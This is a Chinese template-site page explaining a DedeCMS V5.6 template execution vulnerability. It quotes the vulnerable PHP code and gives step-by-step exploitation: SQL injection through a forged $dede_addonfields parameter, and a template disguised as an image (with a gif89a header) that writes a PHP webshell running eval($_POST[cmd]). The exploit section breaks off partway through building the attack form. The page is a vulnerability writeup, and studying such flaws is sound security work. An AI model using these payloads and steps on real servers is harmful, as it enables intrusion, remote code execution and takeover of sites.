DEDECMS网站管理系统模板执行漏洞

响应式自动化设备科技企业网站模板

响应式电子商务公司网站模板

响应式美食糕点企业网站模板

厨房卫浴水龙头网站模板
(自适应手机版)黄色响应式车行汽车租赁网站pbootcms模

(自适应手机端)品牌策划设计类网站pbootcms模板高端

(自适应手机端)响应式别墅办公家庭装修装饰设计类pboo

(自适应手机端)响应式pbootcms装修设计装潢公司网站模
响应式红木实木家具网站模板

迪恩car!汽车二手车交易Discuz模板 X3.2商业版

迪恩摄影Pai(7配色) 商业版（GBK）

律师事务所法务咨询网站模板

织梦DEDECMS网站管理系统模板执行漏洞
一个不小心，你的服务器就会被黑客攻破，比如数据库密码过于简单，服务器密码过于简单，或者CMS系统漏洞。

下面是一个DEDE的模板执行漏洞。

漏洞描述：Dedecms V5.6 Final版本中的各个文件存在一系列问题，经过精心构造的含有恶意代表的模板内容可以通过用户后台的上传附件的功能上传上去，然后通过SQL注入修改附加表的模板路径为我们上传的模板路径，模板解析类：include/inc_archives_view.php没有对模板路径及名称做任何限制，则可以成功执行恶意代码。

1、member/article_edit.php文件（注入）：

漏洞在member文件夹下普遍存在，$dede_addonfields是由用户提交的，可以被伪造，伪造成功即可带入sql语句，于是我们可以给附加表的内容进行update赋值。

//分析处理附加表数据

$inadd_f = '';

if(!emptyempty($dede_addonfields))//自己构造$dede_addonfields

{

$addonfields = explode(';',$dede_addonfields);

if(is_array($addonfields))

{

print_r($addonfields);

foreach($addonfields as $v)

{

if($v=='')

{

continue;

}

$vs = explode(',',$v);

if(!isset(${$vs[0]}))

{

${$vs[0]} = '';

}

${$vs[0]} = GetFieldValueA(${$vs[0]},$vs[1],$aid);

$inadd_f .= ','.$vs[0]." ='".${$vs[0]}."' ";

echo $inadd_f;

}

…

if($addtable!='')

{

$upQuery = "Update `$addtable` set typeid='$typeid',body='$body'{$inadd_f},userip='$userip' where aid='$aid' ";//执行构造的sql

if(!$dsql->ExecuteNoneQuery($upQuery))

{

ShowMsg("更新附加表 `$addtable` 时出错，请联系管理员！","javascript:;");

exit();

}

…

2、include/inc_archives_view.php：

这是模板处理类，如果附加表的模板路径存在，直接从附加表取值；GetTempletFile获取模板文件的方法就是取的此处的模板路径，从来带进去解析。

…

//issystem==-1 表示单表模型，单表模型不支持redirecturl这类参数，因此限定内容普通模型才进行下面查询

if($this->ChannelUnit->ChannelInfos['addtable']!='' && $this->ChannelUnit->ChannelInfos['issystem']!=-1)

{

if(is_array($this->addTableRow))

{

$this->Fields['redirecturl'] = $this->addTableRow['redirecturl'];

$this->Fields['templet'] = $this->addTableRow['templet'];//取值

$this->Fields['userip'] = $this->addTableRow['userip'];

}

$this->Fields['templet'] = (emptyempty($this->Fields['templet']) ? '' : trim($this->Fields['templet']));

$this->Fields['redirecturl'] = (emptyempty($this->Fields['redirecturl']) ? '' : trim($this->Fields['redirecturl']));

$this->Fields['userip'] = (emptyempty($this->Fields['userip']) ? '' : trim($this->Fields['userip']));

}

else

{

$this->Fields['templet'] = $this->Fields['redirecturl'] = '';

}

…

//获得模板文件位置

function GetTempletFile()

{

global $cfg_basedir,$cfg_templets_dir,$cfg_df_style;

$cid = $this->ChannelUnit->ChannelInfos['nid'];

if(!emptyempty($this->Fields['templet']))

{

$filetag = MfTemplet($this->Fields['templet']);

if( !ereg('/', $filetag) ) $filetag = $GLOBALS['cfg_df_style'].'/'.$filetag;

}

else

{

$filetag = MfTemplet($this->TypeLink->TypeInfos["temparticle"]);

}

$tid = $this->Fields['typeid'];

$filetag = str_replace('{cid}', $cid,$filetag);

$filetag = str_replace('{tid}', $tid,$filetag);

$tmpfile = $cfg_basedir.$cfg_templets_dir.'/'.$filetag;

if($cid=='spec')

{

if( !emptyempty($this->Fields['templet']) )

{

$tmpfile = $cfg_basedir.$cfg_templets_dir.'/'.$filetag;

}

else

{

$tmpfile = $cfg_basedir.$cfg_templets_dir."/{$cfg_df_style}/article_spec.htm";

}

if(!file_exists($tmpfile))

{

$tmpfile = $cfg_basedir.$cfg_templets_dir."/{$cfg_df_style}/".($cid=='spec' ? 'article_spec.htm' : 'article_default.htm');

}

return $tmpfile;

}

漏洞利用:

1.上传一个模板文件：

注册一个用户，进入用户管理后台，发表一篇文章，上传一个图片，然后在附件管理里，把图片替换为我们精心构造的模板，比如图片名称是：

uploads/userup/2/12OMX04-15A.jpg

模板内容是（如果限制图片格式，加gif89a）：

{dede:name runphp='yes'}

$fp = @fopen("1.php", 'a');

@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");

@fclose($fp);

{/dede:name}

2.修改刚刚发表的文章，查看源文件，构造一个表单：

<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent"

action="" method="post" enctype="multipart/form-data" onsubmit="return checkSubmit();">

<label>标签TAG：</label>

作者：欣怡建站挑错时间：2020-05-09 08:40

上一篇：织梦DEDECMS教程:去除列表页文章标题加粗标签的方法
下一篇：dedecms最新版本修改任意管理员漏洞+getshell+exp

☉首先声明，只要是我们的vip会员所有源码均可以免费下载，不做任何限制
☉本站的源码不会像其它下载站一样植入大量的广告。为了更好的用户体验以后坚持不打水印
☉本站只提供精品源码，源码在于可用，不在多！！希望在这里找到你合适的。
☉本站提供的整站程序，均带数据及演示地址。可以在任一源码详情页查看演示地址
☉本站所有资源（包括源码、模板、素材、特效等）仅供学习与参考，请勿用于商业用途。
☉如有其他问题，请加网站客服QQ(984818011)进行交流。